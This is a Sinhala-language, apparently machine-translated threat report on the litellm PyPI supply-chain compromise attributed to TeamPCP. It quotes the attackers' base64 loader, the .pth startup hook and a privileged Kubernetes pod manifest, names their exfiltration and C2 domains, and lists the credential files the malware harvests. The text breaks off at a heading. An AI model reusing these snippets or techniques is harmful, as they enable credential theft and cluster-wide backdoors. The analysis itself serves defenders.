LiteLLM සැපයුම් දාම ප්‍රහාරය

LiteLLM සැපයුම් දාම ප්‍රහාරය: TeamPCP AI යටිතල පහසුකම් පසුපසට දැමූ ආකාරය

මෙය වැදගත් වන්නේ ඇයි

2026 මාර්තු 24 වන දින, ජනප්‍රිය පයිතන් පැකේජය ලිටෙල්ම්, දහස් ගණනක් භාවිතා කරන විශ්වීය LLM ප්‍රොක්සි ද්වාරයකි enterpriseOpenAI, Anthropic, Google, සහ AWS Bedrock වැනි යෙදුම් සහ AI සපයන්නන් අතර ගමනාගමනය මෙහෙයවීම සඳහා වන applications, PyPI හි නිහඬව සම්මුතියකට ලක් විය. විෂ සහිත අනුවාද දෙකක් (1.82.7 සහ 1.82.8) එකිනෙකාගෙන් මිනිත්තු 13ක් ඇතුළත ප්‍රකාශයට පත් කරන ලද අතර, අක්තපත්‍ර සොරකම් කරන, වලාකුළු රහස් ඉවත් කරන, Kubernetes පොකුරු හරහා පාර්ශ්වීයව පැතිරෙන සහ දුරස්ථ කේත ක්‍රියාත්මක කිරීමේ හැකියාවන් සහිත ස්ථිර පසුබිමක් ස්ථාපනය කරන ලද බහු-අදියර ගෙවීමක් රැගෙන ගියේය.

දළ වශයෙන් දෛනික බාගත කිරීම් මිලියන 3.6ක් සහ වලාකුළු-ස්වදේශීය AI යටිතල පහසුකම් හරහා ගැඹුරු යෙදවීමකින්, litellm නවීන ප්‍රහාරකයින් ආශා කරන සෑම දෙයකම සන්ධිස්ථානයක පිහිටා ඇත: සෑම ප්‍රධාන AI සැපයුම්කරුවෙකු සඳහාම API යතුරු, වලාකුළු IAM අක්තපත්‍ර, Kubernetes රහස් සහ SSH යතුරු.

නමුත් ලිටෙල්ම් සම්මුතිය හුදකලා සිදුවීමක් නොවේ. එය පස් දින, පස් පරිසර පද්ධති ව්‍යාපාරය ලෙස හඳුන්වන තර්ජන නළුවෙකු විසින් කණ්ඩායමPCP, මුලින්ම ආරක්ෂක ස්කෑනර් යන්ත්‍ර (Aqua Trivy, Checkmarx KICS) විෂ කළ ව්‍යාපාරයක්, පසුව සොරකම් කරන ලද CI/CD npm, OpenVSX සහ අවසානයේ PyPI වෙත ගලා යාමට අක්තපත්‍ර. ප්‍රහාරකයින් ආයුධ සන්නද්ධ කළේ සංවිධාන තම සැපයුම් දාම ආරක්ෂා කර ගැනීම සඳහා විශ්වාසය තබන මෙවලම්ම ය.

මෙම ප්‍රහාරය සැපයුම් දාම තර්ජන සංකීර්ණතාවයේ පියවර වෙනසක් නියෝජනය කරයි. බහු-හොප්, හරස්-පරිසර පද්ධති සැලසුම, ඉහළ වටිනාකමක් කරා ළඟා වීමට ආරක්ෂක මෙවලම් සම්මුතියකට ලක් කරයි. AI යටිතල පහසුකම්, වැඩි වැඩියෙන් වෙළඳ භාණ්ඩකරණය කරන ලද ප්‍රහාරක මෙවලම් සමඟ අනුකූල වන සැලසුම් මට්ටමක් සහ මෙහෙයුම් පරිණතභාවයක් පිළිබිඹු කරයි. ගෙවීම් තත්‍ය කාලීනව පුනරාවර්තනය කරන ලදී (අදහස් දක්වන ලද පෙර අනුවාද ඇතුළුව ගෙවීම් ප්‍රභේද තුනක් මූලාශ්‍ර කේතයේ දිස්වේ), ප්‍රහාරයට පෙර දින C2 යටිතල පහසුකම් ලියාපදිංචි කරන ලදී, සහ නීත්‍යානුකූල වෙළෙන්දා යටිතල පහසුකම් අනුකරණය කිරීම සඳහා පිටකිරීමේ වසම් ප්‍රවේශමෙන් තෝරා ගන්නා ලදී. Cardano අත්සන් කිරීමේ යතුරු සහ WireGuard වින්‍යාස වැනි නිකේතන ඉලක්ක ඇතුළුව කාණ්ඩ 15+ ක් ආවරණය වන පරිදි ක්‍රමානුකූලව පුළුල් අක්තපත්‍ර අස්වනු නෙලන යන්ත්‍රය, බල ගුණකයක් ලෙස AI-සහාය දක්වන අනිෂ්ට මෘදුකාංග සංවර්ධනය දෙසට යොමු වන ගැඹුරු ප්‍රකාශනයක් යෝජනා කරයි.

කාල නියමය

දිනය (UTC) උත්සවය
මාර්තු 19 TeamPCP Aqua Trivy GitHub Action ටැග් සම්මුතියකට ගෙනැවිත්, ඒවා පිටකිරීමේ ද්වේෂසහගත කේතයකින් ප්‍රතිස්ථාපනය කරයි. CI/CD පහළට ගලා යන ගබඩාවලින් රහස්
මාර්තු 21 සමාන ශිල්පීය ක්‍රම භාවිතා කරමින් Checkmarx KICS සහ AST GitHub ක්‍රියා දක්වා සම්මුතිය ව්‍යාප්ත වේ.
මාර්තු 22, 06:35 BerriAI සාමාන්‍ය මාර්ගයෙන් litellm 1.82.6 (අවසාන පිරිසිදු අනුවාදය) ප්‍රකාශයට පත් කරයි CI/CD pipeline ආරක්ෂක ස්කෑන් කිරීම සඳහා ට්‍රයිවි භාවිතා කරන
මාර්තු 23 TeamPCP models.litellm.cloud (exfiltration domain) ලියාපදිංචි කරයි. 66+ npm පැකේජ සහ OpenVSX දිගු සම්මුතියකට ලක් කරයි.
මාර්තු 24, 10:39 litellm 1.82.7 PyPI වෙත ප්‍රකාශයට පත් කරන ලදී -- ගෙවීමේ බර එන්නත් කරන ලදී proxy_server.py මොඩියුල විෂය පථයේ. ආයාත කිරීමේදී ක්‍රියාත්මක වේ
මාර්තු 24, 10:52 litellm 1.82.8 මිනිත්තු 13 කට පසුව ප්‍රකාශයට පත් කරන ලදී -- එකතු කරයි litellm_init.pth, litellm ආයාත කිරීම් පමණක් නොව, සෑම Python පරිවර්තක ආරම්භයකම ක්‍රියාත්මක වන Python මාර්ග වින්‍යාස කොක්කකි. වේගවත් ගෙවීම් පුනරාවර්තනයක් පෙන්වයි.
මාර්තු 24, ~16:00 ප්‍රජා වාර්තා වලින් පසුව PyPI අනුවාද දෙකම ඉවත් කරයි. අනුවාද දර්ශකයෙන් සම්පූර්ණයෙන්ම මකා දමනු ලැබේ (ඇදගෙන ඉවත් නොකෙරේ), නමුත් CDN තාර බෝල ප්‍රවේශ විය හැකිව පවතී.

නිරාවරණ කවුළුව: ආසන්න වශයෙන් පැය 5.5. මෙම කාලය තුළ, ඕනෑම pip install litellm, pip install --upgrade litellm, හෝ CI/CD pipeline නවතම අනුවාදය ඇද ගැනීමෙන් ගෙවීම ක්‍රියාත්මක වනු ඇත.

අනිෂ්ට මෘදුකාංග ඇතුළු වූ ආකාරය: කඳු නැගීමේ සම්මුතිය

ලිටෙල්ම් පැකේජය කෙලින්ම කැඩී ගියේ නැත. ප්‍රහාරකයා එය වෙත ළඟා වූයේ a හරහාය ද්වි-හොප් සැපයුම් දාම ප්‍රහාරය:

Aqua Trivy GitHub Action (compromised March 19)     --> LiteLLM CI/CD pipeline runs Trivy without pinned version         --> Malicious Trivy exfiltrates PYPI_PUBLISH token from GitHub Actions runner             --> Attacker publishes poisoned litellm 1.82.7 and 1.82.8 directly to PyPI

ලයිට්එල්එල්එම් CI/CD pipeline ආරක්ෂක ස්කෑනරයක් ලෙස ට්‍රයිවි භාවිතා කළේය - අවදානම් අල්ලා ගැනීමට නිර්මාණය කර ඇති මෙවලමම ප්‍රහාරක දෛශිකය වූ බැවිනි. pipeline පින් කළ එකක් වෙනුවට විකෘති ටැගය මඟින් ට්‍රයිවි යොමු කර ඇත commit SHA, සම්මුතියට පත් වූ ක්‍රියාව ස්වයංක්‍රීයව ක්‍රියාත්මක විය. ද්වේෂසහගත ට්‍රයිවි ක්‍රියාව පරිසර රහස් බැහැර කළේය, ඒවාට ඇතුළත් වන්නේ PYPI_PUBLISH ටෝකන් එක, TeamPCP හට litellm PyPI ව්‍යාපෘතියට සෘජු ප්‍රකාශන ප්‍රවේශය ලබා දෙයි.

මෙම "ආරක්ෂකයින් සම්මුතියට පත් කිරීමේ" උපාය මාර්ගය TeamPCP ව්‍යාපාරයේ කැපී පෙනෙන ලක්ෂණයකි. ආරක්ෂක මෙවලම් පළමුව ඉලක්ක කර ගැනීමෙන් (Trivy, Checkmarx KICS), ප්‍රහාරකයින් එකවර හඳුනාගැනීම අක්‍රිය කළ අතර පහළ සැපයුම් දාමයන් වෙත වරප්‍රසාද ලත් ප්‍රවේශයක් ලබා ගත්හ.

තාක්ෂණික විශ්ලේෂණය: බර පැටවීම

එන්නත් කිරීමේ ස්ථාන

අනුවාදය 1.82.7 — මොඩියුල මට්ටමේ ක්‍රියාත්මක කිරීම litellm/proxy/proxy_server.py (පේළිය 128):

import subprocess, base64, sys, tempfile, os  b64_payload = "<~12KB base64 blob>"  with tempfile.TemporaryDirectory() as d:     p = os.path.join(d, "p.py")     with open(p, "wb") as f:         f.write(base64.b64decode(b64_payload))     subprocess.run([sys.executable, p])

මෙම කේතය ශබ්දකෝෂයේ වචනාර්ථය සහ මුල් පිටපත අතර මොඩියුල විෂය පථයේ පිහිටා ඇත. showwarning() ශ්‍රිතය. එය වහාම ක්‍රියාත්මක වන විට litellm.proxy.proxy_server ආයාත කර ඇත — එය litellm හි ප්‍රොක්සි ක්‍රියාකාරිත්වයේ ඕනෑම භාවිතයකදී සිදු වේ.

අනුවාදය 1.82.8 — එකතු කරන ලදී litellm_init.pth (පයිතන් මාර්ග වින්‍යාස ගොනුව):

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], ...) 

Python මීට උදාහරණ .pth ගොනු site-packages/ සෑම පරිවර්තක ආරම්භයකම සකසනු ලැබේ, නමුත් ආරම්භ වන රේඛා පමණි import කේතයක් ලෙස ක්‍රියාත්මක වේ. ප්‍රහාරකයා මෙය සූරාකන්නේ මුළු ගෙවීමම තනි එකකට සම්බන්ධ කිරීමෙනි. import ප්රකාශය: import os, subprocess, sys; subprocess.Popen(...). මෙය proxy_server.py එන්නත් කිරීමට වඩා බොහෝ ආක්‍රමණශීලීයි - සෑම Python ක්‍රියාවලි දියත් කිරීමකදීම litellm කිසි විටෙකත් ආනයනය නොකළත් එය ක්‍රියාත්මක වේ. pyproject.toml මෙම ගොනුව බෙදාහැරීමට ඇතුළත් කිරීමට වෙනස් කරන ලදී:

include = [     { path = "litellm_init.pth", format = ["sdist", "wheel"] } ]

1.82.8 අනුවාදයේ මෙසේ ඇත ස්වාධීන ක්‍රියාත්මක කිරීමේ මාර්ග දෙකක්: proxy_server.py එන්නත් කිරීම (litellm proxy import මත ක්‍රියාත්මක වේ) සහ .pth ගොනුව (ඕනෑම Python ආරම්භයක් මත ක්‍රියාත්මක වේ). අතිරික්තයම කැපී පෙනේ - එය එක් මාර්ගයක් පමණක් හඳුනා ගැනීමට හෝ ඉවත් කිරීමට එරෙහිව ආරක්ෂා කරයි. 1.82.7 න් මිනිත්තු 13 කට පසු ආයාත-වේලාවේ සිට ආරම්භක-වේලාව ක්‍රියාත්මක කිරීම දක්වා ඉහළ යාමෙන් ඇඟවෙන්නේ ප්‍රහාරකයා යෙදවීමේ සාර්ථකත්වය නිරීක්ෂණය කරමින් වේගයෙන් පුනරාවර්තනය වෙමින් සිටි බවයි.

අදියර 1: විස්තීර්ණ අක්තපත්‍ර අස්වනු නෙලීම

විකේතනය කරන ලද අභ්‍යන්තර පිටපත ඉතා සූක්ෂම අක්තපත්‍ර රික්තයකි. එය භාවිතා කරන්නේ os.walk()glob.glob()subprocess.check_output(), සහ සම්පූර්ණ පද්ධතියම අතුගා දැමීමට ගොනු කියවීම් යොමු කරන්න:

වර්ගය ඉලක්ක
පද්ධති සමාලෝචනය hostname, whoami, uname -a, ip addr, printenv, ip route
එස්එස්එච් ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, config; සත්කාරක යතුරු /etc/ssh/
වලාකුළු (AWS) ~/.aws/credentials, ~/.aws/config; IMDS භූමිකාව පිළිබඳ සහතික හරහා 169.254.169.254; රහස් කළමනාකරු ListSecrets; එස්එස්එම් DescribeParameters
වලාකුළු (GCP) ~/.config/gcloud/ (පුනරාවර්තන); $GOOGLE_APPLICATION_CREDENTIALS
වලාකුළු (අසුර්) ~/.azure/ (පුනරාවර්තන); පරිසර විචල්‍යයන්
කුබර්නෙට්ස් සේවා ගිණුම් ටෝකන; ca.crtනාම අවකාශය; kubectl get secrets --all-namespaces; K8s API හරහා සියලුම රහස්
පරිසර ගොනු .env, .env.local, .env.production, .env.development, .env.staging — හරහා පුනරාවර්තන ලෙස (ගැඹුර 6) සෙව්වා /home, /root, /opt, /srv, /var/www, /app, /data, /tmp
Docker ~/.docker/config.json, /kaniko/.docker/config.json
පැකේජ ටෝකන ~/.npmrc, ~/.vault-token, ~/.netrc
දත්ත සමුදායන් ~/.pgpass, ~/.my.cnf, /etc/mysql/my.cnf, /etc/redis/redis.conf, MongoDB වින්‍යාසයන්
ටීඑල්එස් / එස්එස්එල් වෙතින් පුද්ගලික යතුරු /etc/ssl/private/, සහතික සංකේතනය කරමු, සියල්ල .pem/.key/.p12/.pfx ගොනු
Git ~/.git-credentials, ~/.gitconfig
CI/CD terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, Jenkinsfile, ansible.cfg
ක්‍රිප්ටෝ පසුම්බි බිට්කොයින්, එතෙරියම් යතුරු ගබඩාව, සොලානා යතුරු යුගල (වලංගු කරන්නා, ඡන්දය, කොටස්, කරාමය), කාර්ඩනෝ අත්සන් කිරීමේ යතුරු, ලිට්කොයින්, ඩොජ්කොයින්, ඉසෙඩ්කාෂ්, ඩෑෂ්, රිපල්, මොනෙරෝ
ෂෙල් ඉතිහාසය .bash_history, .zsh_history, .mysql_history, .psql_history, .rediscli_history
පද්ධති සත්‍යාපනය /etc/passwd, /etc/shadow, සත්‍යාපන ලොග (පිළිගත් SSH සැසි)
වෙබ්හුක්/API යතුරු ස්ලැක් වෙබ් සඳහා ග්‍රෙප්hooks, ඩිස්කෝඩ් වෙබ්hooks, වින්‍යාස ගොනු වල API යතුරු/රහස්
අතාත්වික පෞද්ගලික ජාලය WireGuard වින්‍යාසයන් /etc/wireguard/

මෙම අස්වනු නෙළන යන්ත්‍රයේ විෂය පථය විශ්වකෝෂයකි. එය වලාකුළු අක්තපත්‍ර පමණක් නොව ගුප්ත ව්‍යවහාර මුදල් පසුම්බි, දත්ත සමුදා මුරපද, VPN වින්‍යාසයන් සහ CI/CD රහස් - ප්‍රහාරකයා බහු දෛශික හරහා සම්මුතිගත පද්ධති මුදල් ඉපැයීමට අදහස් කරන බව යෝජනා කරයි.

අදියර 2: සංකේතාත්මක පිටකිරීම

සොරකම් කරන ලද දත්ත දෙමුහුන් සංකේතාංකන ක්‍රමයක් භාවිතයෙන් සංකේතනය කර බැහැර කරනු ලැබේ:

  • AES-256-CBC හඳුන්වා දීම අහඹු 32-බයිට් සැසි යතුරක් සමඟ එකතු කරන ලද සියලුම දත්ත සංකේතනය කිරීම (හරහා openssl enc)
  • ආර්එස්ඒ-4096 ප්‍රහාරකයාගේ එබ්බවූ පොදු යතුර භාවිතයෙන් සැසි යතුර සංකේතනය කිරීම (OAEP පෑඩින්, හරහා openssl pkeyutl)
  • කේතාංක පෙළ ගොනු දෙකම බණ්ඩල් කර ඇත tpcp.tar.gz (එම tpcp උපසර්ගය — “TeamPCP” — ව්‍යාපාරය පුරා ස්ථාවරව දිස්වේ)
  • HTTPS පළ කිරීම https://models.litellm.cloud/ සමග Content-Type: application/octet-stream

වසම models.litellm.cloud ප්‍රහාරයට දිනකට පෙර - මාර්තු 23 වන දින ලියාපදිංචි කරන ලද අතර එය නීත්‍යානුකූල ලිටෙල්ම් යටිතල පහසුකම් සමඟ මිශ්‍ර වීමට නිර්මාණය කර ඇත (සැබෑ ව්‍යාපෘතිය භාවිතා කරන්නේ litellm.ai). පිටවීමේ ගමනාගමනය සමාලෝචනය කරන ජාල-දැනුවත් ආරක්ෂකයෙකු පවා ලිටෙල්ම්ගේම ආදර්ශ අන්ත ලක්ෂ්‍යය ලෙස පෙනෙන දෙයට ගමනාගමනය සලකුණු නොකළ හැකිය.

අදියර 3: ස්ථිර පසුබිම (sysmon.py)

ගෙවීම් භාරය පද්ධති ටෙලිමෙට්‍රි ලෙස වෙස්වලාගත් ඡන්ද පසුපස දොරක් ස්ථාපනය කරයි:

  • මාර්ගය~/.config/sysmon/sysmon.py
  • සේවයsysmon.service (systemd පරිශීලක ඒකකය, "පද්ධති ටෙලිමෙට්‍රි සේවාව" ලෙස විස්තර කර ඇත)
  • හැසිරීම: ආරම්භක තත්පර 300 ක නින්දකින් පසු, මත විමසුම් https://checkmarx.zone/raw සෑම විනාඩි 50 කට වරක්
  • ක්රියාත්මක: C2 විසින් ආපසු ලබා දුන් URL එක බාගත කරයි /tmp/pglog, එය ක්‍රියාත්මක කළ හැකි ලෙස සකසයි (chmod 755), එය වෙන්වූ සැසියක ක්‍රියාත්මක කරයි
  • රාජ්‍ය ලුහුබැඳීම/tmp/.pg_state එකම ගෙවීම නැවත බාගත කිරීම වළක්වයි
  • නොපසුබට උත්සාහයRestart=alwaysRestartSec=10 — බිඳ වැටීම් වලින් බේරී නැවත ආරම්භ වේ

වසම checkmarx.zone යනු චෙක්මාර්ක්ස් (ආරක්ෂක සමාගම) හි අක්ෂර වින්‍යාස දෝෂයකි. checkmarx.com), ජාල ලොග් සමාලෝචනය කරන SOC විශ්ලේෂකයින්ට නීත්‍යානුකූල ආරක්ෂක වෙළෙන්දෙකු ලෙස පෙනෙන දෙයකට ගමනාගමනය දැකගත හැකි වන පරිදි නිර්මාණය කර ඇත. මෙය ආරක්ෂක වෙළෙන්දා සන්නාමකරණය පිටුපස සැඟවී සිටීමේ TeamPCP හි පුළුල් උපාය මාර්ගයට අනුකූල වන හිතාමතා මගහැරීමේ තාක්ෂණයකි.

අදියර 3b: කුබර්නෙට්ස් පාර්ශ්වීය චලනය

අවදානමට ලක් වූ පද්ධතියට Kubernetes සේවා ගිණුම් අක්තපත්‍ර තිබේ නම්, අනිෂ්ට මෘදුකාංගය සියලුම පොකුරු නෝඩ් ගණන් කර යොදවයි වරප්‍රසාද ලත් කරල් එක් එක් අයට:

pod_manifest = {     'apiVersion': 'v1', 'kind': 'Pod',     'metadata': {'name': f'node-setup-{node_name[:35]}', 'namespace': 'kube-system'},     'spec': {         'nodeName': node_name,         'hostPID': True, 'hostNetwork': True,         'tolerations': [{'operator': 'Exists'}],         'containers': [{             'name': 'setup',             'image': 'alpine:latest',             'command': ['sh', '-c', drop_cmd],             'securityContext': {'privileged': True},             'volumeMounts': [{'name': 'host', 'mountPath': '/host'}]         }],         'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}],         'restartPolicy': 'Never'     } }

එක් එක් කැබැල්ල:

  • ධාවනය වන්නේ වරප්‍රසාදිත සමග hostPIDhostNetwork, සහ සම්පූර්ණ සත්කාරක ගොනු පද්ධති ප්‍රවේශය
  • භාවිතා chroot /host එයම ස්ථාපනය කිරීමට sysmon.py සත්කාරකයේ මූල ගොනු පද්ධතියේ පසුපස දොර
  • එය systemd සේවාවක් ලෙස ලියාපදිංචි කරයි, පොඩ් මකාදැමීමෙන් නොනැසී පවතින බව සහතික කරයි.
  • නම් node-setup-* තුළ kube-system නාම අවකාශය නීත්‍යානුකූල පොකුරු යටිතල පහසුකම් ලෙස දිස්වනු ඇත.

මෙයින් අදහස් කරන්නේ a තනිකඩයා CI/CD K8s ප්‍රවේශය සහිත ධාවකයෙකු නිසා පොකුරේ සෑම නෝඩයක්ම පිටුපස දොරට හැරවිය හැක. — කුබර්නෙට්ස් හි ප්‍රොක්සියක් ලෙස ලිටෙල්ම් ක්‍රියාත්මක කරන සංවිධාන සඳහා ව්‍යසනකාරී පාර්ශ්වීය චලන අවස්ථාවක්.

බර පැටවුම් පරිණාමය (අදහස් දැක්වූ ප්‍රභේද)

131-132 පේළිවල ඇති මූලාශ්‍ර කේතයේ ප්‍රහාරකයාගේ සංවර්ධන ක්‍රියාවලිය හෙළි කරන, අදහස් දක්වා ඇති පෙර ගෙවීම් ප්‍රභේද දෙකක් අඩංගු වේ:

  • ප්‍රභේද තුනම එකම පිටකිරීමේ යටිතල පහසුකම් බෙදා ගන්න (models.litellm.cloud), RSA-4096 පොදු යතුර, AES-256-CBC + RSA දෙමුහුන් සංකේතාංකන එතුම, සහ tpcp.tar.gz මිටි නම් කිරීම
  • පෙර ප්‍රභේද එකතු කළා RC4 සංකේතාංකන ස්ථරය දත්ත එකතු කිරීමේ ස්ක්‍රිප්ට් එක තුළ, පිටත AES+RSA එතුමට පෙර අස්වනු නෙළන ලද දත්ත සංකේතනය කරයි. මෙම අභ්‍යන්තර RC4 ස්ථරය ඉවත් කිරීමෙන් ක්‍රියාකාරී ගෙවීම් භාරය (පේළිය 130) සරල කර ඇත.
  • පෙර ප්‍රභේද භාවිතා කරන්නේ exec() සමග StringIO සක්‍රීය ගෙවීම භාවිතා කරන අතරතුර, එකතු කරන්නා ක්‍රියාවලිය තුළ ක්‍රියාත්මක කිරීමට අල්ලා ගන්න subprocess.run() stdout යළි-යොමුවීම් සමඟ — ධාරක ක්‍රියාවලිය දූෂණය වීම වළක්වන පිරිසිදු වෙන්වීමක්
  • ප්‍රභේද තුනම එකම අක්තපත්‍ර කාණ්ඩ සහ එකතු කිරීමේ මාර්ග ඉලක්ක කරයි.
  • පෙර ප්‍රභේදවල RC4 යතුර ප්‍රකෝපකාරී අපහාසයක් වූ අතර එය ටෙලිග්‍රාම් හි නළුවාගේ අවධානයට ලක්වන හැසිරීමට අනුකූල විය.

මෙය මෙහෙයුම අතරතුර ක්‍රියාකාරී වර්ධනයක් පෙන්නුම් කරයි. ප්‍රහාරකයා සංකේතාංකන තොගය සරල කළ අතර එකතු කිරීමේ ඉලක්ක සහ පිටකිරීමේ යටිතල පහසුකම් ස්ථාවරව තබා ගනිමින් ක්‍රියාත්මක කිරීමේ හුදකලාව වැඩිදියුණු කළේය.

සම්මුති දර්ශක (IOCs)

ජාල

දර්ශකයක් වර්ගය අරමුණ
models.litellm.cloud වසම් පිටකිරීමේ අන්ත ලක්ෂ්‍යය (HTTPS POST)
checkmarx.zone වසම් C2 ඡන්ද අන්ත ලක්ෂ්‍යය (HTTPS GET /raw)

සටහන: බාහිර වාර්තාකරණ සබැඳි checkmarx.zone/static/checkmarx-util-1.0.4.tgz TeamPCP ව්‍යාපාරයේ පෙර KICS අදියරට. මෙම URL එක මෙහි විශ්ලේෂණය කරන ලද litellm ගෙවීම්වල හමු නොවීය.

පැකේජ හැෂ්

ගොනුව SHA256
litellm-1.82.7.tar.gz 8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea
litellm-1.82.8.tar.gz d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5

ගොනු පද්ධතිය

දර්ශකයක් වර්ගය අරමුණ
~/.config/sysmon/sysmon.py ගොනුව නොනවතින පසුබිම් පිටපත
~/.config/systemd/user/sysmon.service ගොනුව පද්ධතිමය නොනැසී පැවතීමේ ඒකකය
/tmp/pglog ගොනුව දෙවන අදියර ද්විමය බාගත කරන ලදී.
/tmp/.pg_state ගොනුව C2 තත්ව නිරීක්ෂණය
litellm_init.pth in site-packages/ ගොනුව Python ආරම්භක කොක්ක (v1.82.8 පමණි)
tpcp.tar.gz ගොනුව සංකේතනය කළ පිටකිරීමේ මිටිය

කුබර්නෙට්ස්

දර්ශකයක් වර්ගය අරමුණ
node-setup-* කරල් kube-system පොඩ් වරප්‍රසාදිත පාර්ශ්වීය චලන කරල්
sysmon.service පොකුරු නෝඩ් මත සේවය පොඩ් ගැලවීම හරහා ධාරක මට්ටමේ නොනැසී පැවතීම

ගුප්ත ලේඛන

දර්ශකයක් විස්තර
ප්‍රහාරක RSA-4096 පොදු යතුර SHA256 ඇඟිලි සලකුණ: bc40e5e2c438032bac4dec2ad61eedd4e7c162a8b42004774f6e4330d8137ba8. ගෙවීම් ප්‍රභේද තුනෙහිම ඇතුළත් කර ඇත; අනෙකුත් TeamPCP මෙහෙයුම් හරහා එකම යතුර වාර්තා කර ඇත.
tpcp කෞතුක වස්තු වල උපසර්ගය බණ්ඩල් නම් කිරීමේ සම්මුතිය (tpcp.tar.gz) ව්‍යාපාරය පුරා ස්ථාවරයි

ආරෝපණය: TeamPCP

මෙම ව්‍යාපාරය පිටුපස සිටින තර්ජනාත්මක නළුවා නිරීක්ෂණය කරනු ලබන්නේ කණ්ඩායමPCP, PCPcat, Persy_PCP, ShellForce, සහ DeadCatx3 ලෙසද හැඳින්වේ.

දන්නා ලක්ෂණ:

  • ටෙලිග්‍රාම් නාලිකා නඩත්තු කරන්නේ @Persy_PCP සහ @teampcp ඔවුන් ආරක්ෂක සමාගම්වලට අපහාස කළ තැන
  • බහු පරිසර පද්ධති හරහා ක්‍රියාත්මක වේ (GitHub ක්‍රියා, PyPI, npm, OpenVSX)
  • ව්‍යාපාරයේ සෑම අදියරක් සඳහාම වෙළෙන්දා-විශේෂිත typosquat වසම් භාවිතා කරයි (උදා, checkmarx.zone චෙක්මාර්ක්ස් සඳහා, models.litellm.cloud ලිටෙල්ම් සඳහා)
  • ස්ථාවර යටිතල පහසුකම් සලකුණු: එකම RSA යතුරු යුගලය, tpcp.tar.gz නම් කිරීමේ සම්මුතිය, tpcp-docs-* ඩෙඩ්-ඩ්‍රොප් ස්ටේජින් ලෙස භාවිතා කරන GitHub ගබඩාවන්
  • පහළ සැපයුම් දාමයන්ට පිවිසුම් ස්ථාන ලෙස ආරක්ෂක මෙවලම් ඉලක්ක කරයි

ආරෝපණ විශ්වාසය: ඉහළ. බෙදාගත් RSA පොදු යතුර, tpcp කෞතුක වස්තු නම් කිරීම, C2 යටිතල පහසුකම් අතිච්ඡාදනය වීම සහ දින පහක ව්‍යාපාරය පුරා මෙහෙයුම් වේගය, Trivy, KICS, npm, OpenVSX සහ litellm සම්මුතීන් එකම නළුවාට දැඩි ලෙස සම්බන්ධ කරයි.

අභිප්රේරණය: මූල්‍යමය (ක්‍රිප්ටෝ පසුම්බි සොරකම, වලාකුළු අක්තපත්‍ර මුදල් ඉපැයීම) ප්‍රසිද්ධිය (ටෙලිග්‍රෑම් උපහාසය) සමඟ ඒකාබද්ධ විය හැකිය. AWS IAM සිට Solana වලංගුකාරක යතුරු යුගල දක්වා WireGuard වින්‍යාස දක්වා - අක්තපත්‍ර අස්වැන්න නෙළීමේ පළල - සෑම සම්මුතියකින්ම ROI උපරිම කිරීමට උත්සාහ කරන මූල්‍යමය වශයෙන් අභිප්‍රේරිත නළුවෙකු යෝජනා කරයි.

විය හැකි AI සහාය: අක්තපත්‍ර අස්වනු නෙළන්නා ක්‍රමානුකූලව විස්තීර්ණයි - කාඩනෝ අත්සන් කිරීමේ යතුරු, වයර්ගාර්ඩ් වින්‍යාස සහ කනිකෝ ඩොකර් අක්තපත්‍ර වැනි නිකේතන ඉලක්ක ඇතුළුව කාණ්ඩ 15+ - AI සහාය ඇතිව ගණනය කිරීමට අනුකූල වන ආකාරයෙන්. ගෙවීම් පුනරාවර්තනයේ වේගය (විවිධ සංකේතාංකන යෝජනා ක්‍රම සහිත ප්‍රභේද තුනක්), හරස්-පරිසර පද්ධති සම්බන්ධීකරණය (දින 5 කින් පරිසර පද්ධති 5), සහ මෙහෙයුම් OPSEC (විකුණුම්කරු-අනුකරණය කරන වසම්, දෙමුහුන් සංකේතනය, ටෙලිමෙට්‍රි ලෙස වෙස්වලාගත් පද්ධතිමය නොපසුබට උත්සාහය) බල ගුණකයක් ලෙස AI සහාය ඇතිව සංවර්ධනය පිළිබිඹු කළ හැකි ප්‍රතිදාන මට්ටමක් යෝජනා කරයි. මෙම තක්සේරුව සමපේක්ෂනීයයි; දක්ෂ ක්‍රියාකරුවන්ට AI මෙවලම් නොමැතිව සමාන විෂය පථයක් ලබා ගත හැකිය.

නව TTP සහ ශිල්පීය ක්‍රම

1. ආරක්ෂක මෙවලම් සැපයුම් දාම විෂ වීම (T1195.002 ප්‍රභේදය)

පහළ ඉලක්ක කරා ළඟා වීමට ප්‍රථම වරට ආරක්ෂක ස්කෑනර් යන්ත්‍ර (ට්‍රයිවි, KICS) සම්මුතියකට ලක් කිරීම නව උත්සන්න වීමකි. ප්‍රහාරකයා පුස්තකාලයක් පමණක් සම්මුතියකට ලක් කළේ නැත - ඔවුන් සංවිධාන භාවිතා කරන මෙවලම් සම්මුතියකට ලක් කළහ. හඳුනාගත හැකිය සම්මුතියට පත් පුස්තකාල. මෙය අන්ධ ස්ථානයක් නිර්මාණය කරයි: අනිෂ්ට කේතය අල්ලා ගත යුතු ස්කෑනරයම බෙදා හැරීමේ යාන්ත්‍රණයයි.

2 පයිතන් .pth ගොනු නොනැසී පැවතීම (T1546)

එම litellm_init.pth v1.82.8 හි තාක්ෂණය විශේෂයෙන් කපටියි. Python .pth ගොනු site-packages/ සෑම පරිවර්තක ආරම්භයකම සකසනු ලැබේ; ආරම්භ වන ඕනෑම පේළියක් import කේතයක් ලෙස ක්‍රියාත්මක වේ. ගෙවීම තනි එකකට සම්බන්ධ කිරීමෙන් import ප්‍රකාශය අනුව, ප්‍රහාරකයා සෑම පයිතන් ක්‍රියාවලියකම ක්‍රියාත්මක කිරීම සාක්ෂාත් කර ගනී - litellm ආනයනය කළ විට පමණක් නොවේ. මෙයින් අදහස් කරන්නේ litellm ස්ථාපනය කර ඇති නමුත් කිසි විටෙකත් භාවිතා නොකළත් ගෙවීම් භාරය ක්‍රියාත්මක වන අතර, එය සම්මුතියකට ලක් වූ ඒවා ප්‍රතිස්ථාපනය කරන ප්‍රතිකර්ම වලින් බේරී සිටින බවයි. .py පරීක්ෂා නොකර ගොනු .pth ගොනු.

3. වරප්‍රසාදිත පොඩ් යෙදවීම (T1610, T1611) හරහා කුබර්නෙට්ස් පොකුරු-පුළුල් පාර්ශ්වීය චලනය

